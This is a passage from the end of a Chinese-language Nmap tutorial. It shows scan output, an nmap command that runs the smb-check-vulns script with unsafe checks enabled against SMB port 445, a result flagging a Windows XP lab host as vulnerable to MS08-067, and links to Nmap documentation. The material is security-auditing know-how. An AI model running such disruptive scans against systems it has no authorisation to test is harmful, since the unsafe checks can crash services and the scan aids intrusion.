Nmap done: 256 IP addresses (1 hosts up) scanned in 28.74 seconds
如果开启Netbios服务,检查是否存在漏洞

nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 10.0.0.1

Nmap scan report for ie6winxp.decepticons (10.0.1.1)
Host is up (0.00026s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: NOT VULNERABLE
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds
根据扫描结果,发现存在MS08-067漏洞

0x05参考
原文

http://highon.coffee/docs/nmap/

Namp官网的完整手册

https://svn.nmap.org/nmap/docs/nmap.usage.txt

Nmap官方的中文手册

http://nmap.org/man/zh/

国内的一篇讲Nmap的,写的挺不错的

http://blog.csdn.net/aspirationflow/article/details/7694274

终极必杀:

man nmap